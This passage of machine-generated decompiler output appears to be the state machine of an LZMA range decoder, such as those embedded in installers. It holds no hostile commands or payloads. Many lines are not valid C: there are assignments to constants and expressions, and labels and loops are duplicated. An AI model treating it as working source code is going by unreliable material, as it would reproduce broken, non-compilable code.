                            												L24:
                            												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                            												 *(_t613 - 0x84) = 6;
                            												 *(_t613 - 0x4c) = _t553;
                            												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                            												L132:
                            												 *(_t613 - 0x54) = _t606;
                            												goto L133;
                            											case 3:
                            												L21:
                            												__eflags =  *(_t613 - 0x6c);
                            												if( *(_t613 - 0x6c) == 0) {
                            													 *(_t613 - 0x88) = 3;
                            													goto L170;
                            												}
                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            												_t67 = _t613 - 0x70;
                            												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                            												__eflags =  *_t67;
                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                            												L23:
                            												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                            												if( *(_t613 - 0x48) != 0) {
                            													goto L21;
                            												}
                            												goto L24;
                            											case 4:
                            												L133:
                            												_t531 =  *_t606;
                            												_t589 = _t531 & 0x0000ffff;
                            												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                            												if( *(_t613 - 0xc) >= _t565) {
                            													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                            													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                            													 *(_t613 - 0x40) = 1;
                            													_t532 = _t531 - (_t531 >> 5);
                            													 *_t606 = _t532;
                            												} else {
                            													 *(_t613 - 0x10) = _t565;
                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                            													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                            												}
                            												if( *(_t613 - 0x10) >= 0x1000000) {
                            													goto L139;
                            												}
                            											case 5:
                            												goto L137;
                            											case 6:
                            												__edx = 0;
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *(__ebp - 0x38);
                            													 *(__ebp - 0x34) = 1;
                            													 *(__ebp - 0x84) = 7;
                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                            													while(1) {
                            														L132:
                            														 *(_t613 - 0x54) = _t606;
                            														goto L133;
                            													}
                            												}
                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                            												__esi =  *(__ebp - 0x60);
                            												__cl = 8;
                            												__cl = 8 -  *(__ebp - 0x3c);
                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                            												__ecx =  *(__ebp - 0x3c);
                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                            												__ecx =  *(__ebp - 4);
                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                            												__eflags =  *(__ebp - 0x38) - 4;
                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            												if( *(__ebp - 0x38) >= 4) {
                            													__eflags =  *(__ebp - 0x38) - 0xa;
                            													if( *(__ebp - 0x38) >= 0xa) {
                            														_t98 = __ebp - 0x38;
                            														 *_t98 =  *(__ebp - 0x38) - 6;
                            														__eflags =  *_t98;
                            													} else {
                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                            													}
                            												} else {
                            													 *(__ebp - 0x38) = 0;
                            												}
                            												__eflags =  *(__ebp - 0x34) - __edx;
                            												if( *(__ebp - 0x34) == __edx) {
                            													__ebx = 0;
                            													__ebx = 1;
                            													goto L61;
                            												} else {
                            													__eax =  *(__ebp - 0x14);
                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            													__eflags = __eax -  *(__ebp - 0x74);
                            													if(__eax >=  *(__ebp - 0x74)) {
                            														__eax = __eax +  *(__ebp - 0x74);
                            														__eflags = __eax;
                            													}
                            													__ecx =  *(__ebp - 8);
                            													__ebx = 0;
                            													__ebx = 1;
                            													__al =  *((intOrPtr*)(__eax + __ecx));
                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                            													goto L41;
                            												}
                            											case 7:
                            												__eflags =  *(__ebp - 0x40) - 1;
                            												if( *(__ebp - 0x40) != 1) {
                            													__eax =  *(__ebp - 0x24);
                            													 *(__ebp - 0x80) = 0x16;
                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            													__eax =  *(__ebp - 0x28);
                            													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            													__eax =  *(__ebp - 0x2c);
                            													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            													__eax = 0;
                            													__eflags =  *(__ebp - 0x38) - 7;
                            													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            													__al = __al & 0x000000fd;
                            													__eax = (__eflags >= 0) - 1 + 0xa;
                            													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                            													__eax =  *(__ebp - 4);
                            													__eax =  *(__ebp - 4) + 0x664;
                            													__eflags = __eax;
                            													 *(__ebp - 0x58) = __eax;
                            													goto L69;
                            												}
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x84) = 8;
                            												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                            												while(1) {
                            													L132:
                            													 *(_t613 - 0x54) = _t606;
                            													goto L133;
                            												}
                            											case 8:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *(__ebp - 0x38);
                            													 *(__ebp - 0x84) = 0xa;
                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                            												} else {
                            													__eax =  *(__ebp - 0x38);
                            													__ecx =  *(__ebp - 4);
                            													__eax =  *(__ebp - 0x38) + 0xf;
                            													 *(__ebp - 0x84) = 9;
                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                            												}
                            												while(1) {
                            													L132:
                            													 *(_t613 - 0x54) = _t606;
                            													goto L133;
                            												}
                            											case 9:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													goto L89;
                            												}
                            												__eflags =  *(__ebp - 0x60);
                            												if( *(__ebp - 0x60) == 0) {
                            													goto L171;
                            												}
                            												__eax = 0;
                            												__eflags =  *(__ebp - 0x38) - 7;
                            												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                            												__eflags = _t259;
                            												0 | _t259 = _t259 + _t259 + 9;
                            												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                            												goto L76;
                            											case 0xa:
                            												goto L0;
                            											case 0xb:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__ecx =  *(__ebp - 0x24);
                            													__eax =  *(__ebp - 0x20);
                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            												} else {
                            													__eax =  *(__ebp - 0x24);
                            												}
                            												__ecx =  *(__ebp - 0x28);
                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            												goto L88;
                            											case 0xc:
                            												L99:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0xc;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t334 = __ebp - 0x70;
                            												 *_t334 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t334;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												__eax =  *(__ebp - 0x2c);
                            												goto L101;
                            											case 0xd:
                            												L37:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0xd;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t122 = __ebp - 0x70;
                            												 *_t122 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t122;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												L39:
                            												__eax =  *(__ebp - 0x40);
                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                            													goto L48;
                            												}
                            												__eflags = __ebx - 0x100;
                            												if(__ebx >= 0x100) {
                            													goto L54;
                            												}
                            												L41:
                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                            												__ecx =  *(__ebp - 0x58);
                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                            												 *(__ebp - 0x48) = __eax;
                            												__eax = __eax + 1;
                            												__eax = __eax << 8;
                            												__eax = __eax + __ebx;
                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            												__ax =  *__esi;
                            												 *(__ebp - 0x54) = __esi;
                            												__edx = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													 *(__ebp - 0x40) = 1;
                            													__cx = __ax >> 5;
                            													__eflags = __eax;
                            													__ebx = __ebx + __ebx + 1;
                            													 *__esi = __ax;
                            												} else {
                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edx;
                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                            													__ebx = __ebx + __ebx;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													goto L39;
                            												} else {
                            													goto L37;
                            												}
                            											case 0xe:
                            												L46:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0xe;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t156 = __ebp - 0x70;
                            												 *_t156 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t156;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												while(1) {
                            													L48:
                            													__eflags = __ebx - 0x100;
                            													if(__ebx >= 0x100) {
                            														break;
                            													}
                            													__eax =  *(__ebp - 0x58);
                            													__edx = __ebx + __ebx;
                            													__ecx =  *(__ebp - 0x10);
                            													__esi = __edx + __eax;
                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                            													__ax =  *__esi;
                            													 *(__ebp - 0x54) = __esi;
                            													__edi = __ax & 0x0000ffff;
                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            													__eflags =  *(__ebp - 0xc) - __ecx;
                            													if( *(__ebp - 0xc) >= __ecx) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            														__cx = __ax;
                            														_t170 = __edx + 1; // 0x1
                            														__ebx = _t170;
                            														__cx = __ax >> 5;
                            														__eflags = __eax;
                            														 *__esi = __ax;
                            													} else {
                            														 *(__ebp - 0x10) = __ecx;
                            														0x800 = 0x800 - __edi;
                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            														__ebx = __ebx + __ebx;
                            														 *__esi = __cx;
                            													}
                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                            													 *(__ebp - 0x44) = __ebx;
                            													if( *(__ebp - 0x10) >= 0x1000000) {
                            														continue;
                            													} else {
                            														goto L46;
                            													}
                            												}
                            												L54:
                            												_t173 = __ebp - 0x34;
                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                            												__eflags =  *_t173;
                            												goto L55;
                            											case 0xf:
                            												L58:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0xf;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t203 = __ebp - 0x70;
                            												 *_t203 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t203;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												L60:
                            												__eflags = __ebx - 0x100;
                            												if(__ebx >= 0x100) {
                            													L55:
                            													__al =  *(__ebp - 0x44);
                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                            													goto L56;
                            												}
                            												L61:
                            												__eax =  *(__ebp - 0x58);
                            												__edx = __ebx + __ebx;
                            												__ecx =  *(__ebp - 0x10);
                            												__esi = __edx + __eax;
                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                            												__ax =  *__esi;
                            												 *(__ebp - 0x54) = __esi;
                            												__edi = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													_t217 = __edx + 1; // 0x1
                            													__ebx = _t217;
                            													__cx = __ax >> 5;
                            													__eflags = __eax;
                            													 *__esi = __ax;
                            												} else {
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edi;
                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            													__ebx = __ebx + __ebx;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													goto L60;
                            												} else {
                            													goto L58;
                            												}
                            											case 0x10:
                            												L109:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0x10;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t365 = __ebp - 0x70;
                            												 *_t365 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t365;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												goto L111;
                            											case 0x11:
                            												goto L69;
                            											case 0x12:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													__eax =  *(__ebp - 0x58);
                            													 *(__ebp - 0x84) = 0x13;
                            													__esi =  *(__ebp - 0x58) + 2;
                            													while(1) {
                            														L132:
                            														 *(_t613 - 0x54) = _t606;
                            														goto L133;
                            													}
                            												}
                            												__eax =  *(__ebp - 0x4c);
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                            												__ecx =  *(__ebp - 0x58);
                            												__eax =  *(__ebp - 0x4c) << 4;
                            												__eflags = __eax;
                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                            												goto L130;
                            											case 0x13:
                            												__eflags =  *(__ebp - 0x40);
                            												if( *(__ebp - 0x40) != 0) {
                            													_t469 = __ebp - 0x58;
                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                            													__eflags =  *_t469;
                            													 *(__ebp - 0x30) = 0x10;
                            													 *(__ebp - 0x40) = 8;
                            													L144:
                            													 *(__ebp - 0x7c) = 0x14;
                            													goto L145;
                            												}
                            												__eax =  *(__ebp - 0x4c);
                            												__ecx =  *(__ebp - 0x58);
                            												__eax =  *(__ebp - 0x4c) << 4;
                            												 *(__ebp - 0x30) = 8;
                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                            												L130:
                            												 *(__ebp - 0x58) = __eax;
                            												 *(__ebp - 0x40) = 3;
                            												goto L144;
                            											case 0x14:
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                            												__eax =  *(__ebp - 0x80);
                            												 *(_t613 - 0x88) = _t533;
                            												goto L1;
                            											case 0x15:
                            												__eax = 0;
                            												__eflags =  *(__ebp - 0x38) - 7;
                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            												__al = __al & 0x000000fd;
                            												__eax = (__eflags >= 0) - 1 + 0xb;
                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                            												goto L120;
                            											case 0x16:
                            												__eax =  *(__ebp - 0x30);
                            												__eflags = __eax - 4;
                            												if(__eax >= 4) {
                            													_push(3);
                            													_pop(__eax);
                            												}
                            												__ecx =  *(__ebp - 4);
                            												 *(__ebp - 0x40) = 6;
                            												__eax = __eax << 7;
                            												 *(__ebp - 0x7c) = 0x19;
                            												 *(__ebp - 0x58) = __eax;
                            												goto L145;
                            											case 0x17:
                            												L145:
                            												__eax =  *(__ebp - 0x40);
                            												 *(__ebp - 0x50) = 1;
                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                            												goto L149;
                            											case 0x18:
                            												L146:
                            												__eflags =  *(__ebp - 0x6c);
                            												if( *(__ebp - 0x6c) == 0) {
                            													 *(__ebp - 0x88) = 0x18;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x70);
                            												__eax =  *(__ebp - 0xc);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												_t484 = __ebp - 0x70;
                            												 *_t484 =  *(__ebp - 0x70) + 1;
                            												__eflags =  *_t484;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            												L148:
                            												_t487 = __ebp - 0x48;
                            												 *_t487 =  *(__ebp - 0x48) - 1;
                            												__eflags =  *_t487;
                            												L149:
                            												__eflags =  *(__ebp - 0x48);
                            												if( *(__ebp - 0x48) <= 0) {
                            													__ecx =  *(__ebp - 0x40);
                            													__ebx =  *(__ebp - 0x50);
                            													0 = 1;
                            													__eax = 1 << __cl;
                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                            													__eax =  *(__ebp - 0x7c);
                            													 *(__ebp - 0x44) = __ebx;
                            													while(1) {
                            														 *(_t613 - 0x88) = _t533;
                            														goto L1;
                            													}
                            												}
                            												__eax =  *(__ebp - 0x50);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            												__eax =  *(__ebp - 0x58);
                            												__esi = __edx + __eax;
                            												 *(__ebp - 0x54) = __esi;
                            												__ax =  *__esi;
                            												__edi = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													__cx = __ax >> 5;
                            													__eax = __eax - __ecx;
                            													__edx = __edx + 1;
                            													__eflags = __edx;
                            													 *__esi = __ax;
                            													 *(__ebp - 0x50) = __edx;
                            												} else {
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edi;
                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													goto L148;
                            												} else {
                            													goto L146;
                            												}
                            											case 0x19:
                            												__eflags = __ebx - 4;
                            												if(__ebx < 4) {
                            													 *(__ebp - 0x2c) = __ebx;
                            													L119:
                            													_t393 = __ebp - 0x2c;
                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                            													__eflags =  *_t393;
                            													L120:
                            													__eax =  *(__ebp - 0x2c);
                            													__eflags = __eax;
                            													if(__eax == 0) {
                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                            														goto L170;
                            													}
                            													__eflags = __eax -  *(__ebp - 0x60);
                            													if(__eax >  *(__ebp - 0x60)) {
                            														goto L171;
                            													}
                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                            													__eax =  *(__ebp - 0x30);
                            													_t400 = __ebp - 0x60;
                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                            													__eflags =  *_t400;
                            													goto L123;
                            												}
                            												__ecx = __ebx;
                            												__eax = __ebx;
                            												__ecx = __ebx >> 1;
                            												__eax = __ebx & 0x00000001;
                            												__ecx = (__ebx >> 1) - 1;
                            												__al = __al | 0x00000002;
                            												__eax = (__ebx & 0x00000001) << __cl;
                            												__eflags = __ebx - 0xe;
                            												 *(__ebp - 0x2c) = __eax;
                            												if(__ebx >= 0xe) {
                            													__ebx = 0;
                            													 *(__ebp - 0x48) = __ecx;
                            													L102:
                            													__eflags =  *(__ebp - 0x48);
                            													if( *(__ebp - 0x48) <= 0) {
                            														__eax = __eax + __ebx;
                            														 *(__ebp - 0x40) = 4;
                            														 *(__ebp - 0x2c) = __eax;
                            														__eax =  *(__ebp - 4);
                            														__eax =  *(__ebp - 4) + 0x644;
                            														__eflags = __eax;
                            														L108:
                            														__ebx = 0;
                            														 *(__ebp - 0x58) = __eax;
                            														 *(__ebp - 0x50) = 1;
                            														 *(__ebp - 0x44) = 0;
                            														 *(__ebp - 0x48) = 0;
                            														L112:
                            														__eax =  *(__ebp - 0x40);
                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                            															_t391 = __ebp - 0x2c;
                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                            															__eflags =  *_t391;
                            															goto L119;
                            														}
                            														__eax =  *(__ebp - 0x50);
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            														__eax =  *(__ebp - 0x58);
                            														__esi = __edi + __eax;
                            														 *(__ebp - 0x54) = __esi;
                            														__ax =  *__esi;
                            														__ecx = __ax & 0x0000ffff;
                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                            														__eflags =  *(__ebp - 0xc) - __edx;
                            														if( *(__ebp - 0xc) >= __edx) {
                            															__ecx = 0;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                            															__ecx = 1;
                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                            															__ebx = 1;
                            															__ecx =  *(__ebp - 0x48);
                            															__ebx = 1 << __cl;
                            															__ecx = 1 << __cl;
                            															__ebx =  *(__ebp - 0x44);
                            															__ebx =  *(__ebp - 0x44) | __ecx;
                            															__cx = __ax;
                            															__cx = __ax >> 5;
                            															__eax = __eax - __ecx;
                            															__edi = __edi + 1;
                            															__eflags = __edi;
                            															 *(__ebp - 0x44) = __ebx;
                            															 *__esi = __ax;
                            															 *(__ebp - 0x50) = __edi;
                            														} else {
                            															 *(__ebp - 0x10) = __edx;
                            															0x800 = 0x800 - __ecx;
                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            															 *__esi = __dx;
                            														}
                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                            														if( *(__ebp - 0x10) >= 0x1000000) {
                            															L111:
                            															_t368 = __ebp - 0x48;
                            															 *_t368 =  *(__ebp - 0x48) + 1;
                            															__eflags =  *_t368;
                            															goto L112;
                            														} else {
                            															goto L109;
                            														}
                            													}
                            													__ecx =  *(__ebp - 0xc);
                            													__ebx = __ebx + __ebx;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            													 *(__ebp - 0x44) = __ebx;
                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                            														__ecx =  *(__ebp - 0x10);
                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            														__ebx = __ebx | 0x00000001;
                            														__eflags = __ebx;
                            														 *(__ebp - 0x44) = __ebx;
                            													}
                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                            													if( *(__ebp - 0x10) >= 0x1000000) {
                            														L101:
                            														_t338 = __ebp - 0x48;
                            														 *_t338 =  *(__ebp - 0x48) - 1;
                            														__eflags =  *_t338;
                            														goto L102;
                            													} else {
                            														goto L99;
                            													}
                            												}
                            												__edx =  *(__ebp - 4);
                            												__eax = __eax - __ebx;
                            												 *(__ebp - 0x40) = __ecx;
                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                            												goto L108;
                            											case 0x1a:
                            												L56:
                            												__eflags =  *(__ebp - 0x64);
                            												if( *(__ebp - 0x64) == 0) {
                            													 *(__ebp - 0x88) = 0x1a;
                            													goto L170;
                            												}
                            												__ecx =  *(__ebp - 0x68);
                            												__al =  *(__ebp - 0x5c);
                            												__edx =  *(__ebp - 8);
                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            												 *( *(__ebp - 0x68)) = __al;
                            												__ecx =  *(__ebp - 0x14);
                            												 *(__ecx +  *(__ebp - 8)) = __al;
                            												__eax = __ecx + 1;
                            												__edx = 0;
